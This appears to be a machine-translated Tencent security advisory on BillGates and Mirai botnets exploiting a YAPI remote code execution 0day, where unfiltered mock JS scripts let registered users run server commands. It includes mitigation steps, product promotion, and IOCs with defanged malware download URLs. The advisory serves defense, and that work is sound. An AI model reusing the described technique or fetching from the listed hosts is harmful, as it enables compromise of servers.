One 、 summary

Tencent host security （ Cloud mirror ） Capture YAPI Remote code execution 0day Loophole exploitation , The attack is spreading . suffer YAPI Remote code execution 0day Holes affect , from 7 Yue di 1 Week begins , The number of failed virtual machines without any security protection system has reached thousands . There have been two collapse peaks , Once in 7 month 3 Number , Once in 7 month 7 Number .BillGates Botnet in 7 month 1 The first attack was launched on the th ,7 month 4 Japan Mirai The scale of Botnet Trojan attack is larger , Deployed Tencent cloud firewall （ link ） Your virtual machine successfully defends against this round of attacks .

​BillGates Botnets and Mirai Botnet Trojans are a family of botnets that have been active for many years , These two botnet families often use high-risk vulnerability exploitation as an intrusion means , Tencent security researchers found that these two gangs are using YAPI The Remote Code Execution Vulnerability of the interface management platform is exploited , At present, there is no patch for this vulnerability , be in 0day state .

YAPI The interface management platform is an open source project of a large front-end technology center of a domestic travel website , Use mock data / The script acts as the intermediate interaction layer , Provide more elegant interface management services for front-end and background developers and testers , The system has been adopted by many well-known Internet enterprises in China . Tencent secure cyberspace mapping data display , Domestic use YAPI There are tens of thousands of servers in the interface management platform , Mainly distributed in Zhejiang 、 Beijing 、 Shanghai 、 Guangdong and other provinces （ More than 80%）.

because YAPI Remote code execution 0day There is no patch for the vulnerability ,BillGates Botnets and Mirai The botnet Trojan horse family mainly uses the controlled host to DDoS attack 、 Leave the back door or carry out mining operations . Tencent security experts suggest YAPI The government and enterprise organizations of the interface management platform shall take the following measures to mitigate the vulnerability risk as soon as possible ：

1. Deploy Tencent cloud firewall to intercept threats in real time ;

2. close YAPI User registration function , To block the attacker from registering ;

3. Delete malicious registered users , Prevent attackers from adding... Again mock Script ;

4. Delete malicious mock Script , Prevent from being triggered by access again ;

5. The server rolls back the snapshot , It can clear the backdoor of exploit implantation .

Tencent security threat intelligence system has supported automatic output of detailed analysis report of alarm events , It is convenient for security operation and maintenance personnel to obtain richer intelligence information , So as to trace back the alarm events .

Tencent security's full range of products have supported YAPI The interface management platform uses remote code execution vulnerabilities to detect and defend ：

Two 、 Tencent security solutions

BillGates Family and Mirai Family related threat data has been added to Tencent Security Threat Intelligence , Empower Tencent with a full range of security products , Enterprise customers subscribe to Tencent security threat intelligence products , It can make all security devices in the whole network have the same threat discovery as Tencent security products 、 Defense and clearance capabilities .

Tencent Security Threat Intelligence Center has detected the use of YAPI The attacks launched by the Remote Code Execution Vulnerability of the interface management platform have affected thousands of virtual machines without any security protection products deployed , Tencent security experts suggest that the public cloud system of government and enterprise institutions deploy Tencent cloud firewall 、 Tencent host security （ Cloud mirror ） And other products to detect and defend against related threats .

Tencent cloud firewall supports detection, interception and utilization YAPI Attack activities initiated by Remote Code Execution Vulnerability of interface management platform . Tencent cloud firewall has built-in virtual patch defense mechanism , It can actively defend against some high-risk and highly utilized vulnerabilities .

Tencent host security has been deployed （ Cloud mirror ） Of enterprise customers can be detected through high-risk command monitoring , Tencent host security （ Cloud mirror ） The Trojan landing file generated during the attack can be automatically detected , Customers can log in to Tencent cloud -> Host security console , Check the warning information of virus and Trojan horse , Isolate or delete the malicious Trojan horse with one click . Customers can manage the vulnerability of Tencent host security 、 The baseline management function performs security vulnerability detection and weak password detection on network assets .

Private cloud customers can deploy Tencent advanced threat detection system through bypass （NTA、 Royal boundary ） Conduct flow detection and analysis , Find out in time the hacker Gang's attacks on the enterprise's private cloud by exploiting vulnerabilities . Tencent advanced threat detection system （NTA、 Royal boundary ） Can detect utilization YAPI Malicious attack activities initiated by Remote Code Execution Vulnerability of interface management platform .

Enterprise customers can deploy Tencent sky curtain through bypass （NIPS） Real time interception and utilization YAPI Network communication connection of Remote Code Execution Vulnerability of interface management platform , Completely block attack traffic . Tencent skyline （NIPS） Based on Tencent's self-developed security computing power algorithm PaaS advantage , Form a trillion level massive sample 、 Millisecond response 、 The automatic intelligent 、 Security visualization and other capabilities of the network border collaborative protection system .

3、 ... and 、YAPI Interface management platform 0day Vulnerability analysis

YAPI The interface management platform is an open source project of a large front-end technology center of an Internet enterprise , Use mock data / The script acts as the intermediate interaction layer , Provide more elegant interface management services for front-end and background developers and testers . The platform has been adopted by many well-known Internet enterprises in China .

among mock Data returns fixed content by setting fixed data , For the case that the response content needs to be customized according to the user request mock Script by writing JS The script handles the user request parameters and returns customized content , This vulnerability occurred in mock Script service .

because mock The script customization service is not for JS Scripts are filtered by commands , The user can add any request processing script , So you can embed commands in your scripts , Trigger command execution when the user access interface initiates a request .

There is no patch for this vulnerability , It is recommended that the affected enterprises refer to the following schemes to mitigate risks ：

1. Deploy Tencent cloud firewall to intercept threats in real time ;

2. close YAPI User registration function , To block the attacker from registering ;

3. Delete malicious registered users , Prevent attackers from adding... Again mock Script ;

4. Delete malicious mock Script , Prevent from being triggered by access again ;

5. The server rolls back the snapshot , It can clear the backdoor of exploit implantation .

Four 、 Detailed analysis

Attack script

The attacker first registers the function and first registers the account , You can customize your account only after you log in mock Script .

Through mock Malicious commands are embedded in the script , To be accessed by the user mock Command execution is triggered when the interface initiates a request .

Trojan files

7.1 The accumulated Trojan files captured by using this vulnerability on the host side since the ：

Trojan file details ：

No new variants are found in the Trojan files delivered by this attack , But the exploit speed is very fast 7.2 After the attack on the th , Thousands of mainframes have been lost in just one week , Currently, there is no official patch available , Affected customers need to turn off user registration and script adding permission on the host side , The failed host needs to rollback the server snapshot as soon as possible .

BillGates Botnet Trojans and Mirai Botnet Trojans are no different from previous versions , No more details here .

Attack behavior from the perspective of threat

IOCs

MD5

c303c2fff08565b7977afccb762e2072

56b157ffd5a4b8b26d472395c8d2f7dc

3b904f9bc4f8f504598127ed702c3e1e

URL：

hxxp://2w.kacdn.cn/20000

hxxp://117.24.13.169:881/KaBot

hxxp://117.24.13.169:118/2771

hxxp://117.24.13.169:664/botmm/x86_64

hxxp://66.42.103.186/hang/x86_64

hxxp://27.50.49.61:1231/X64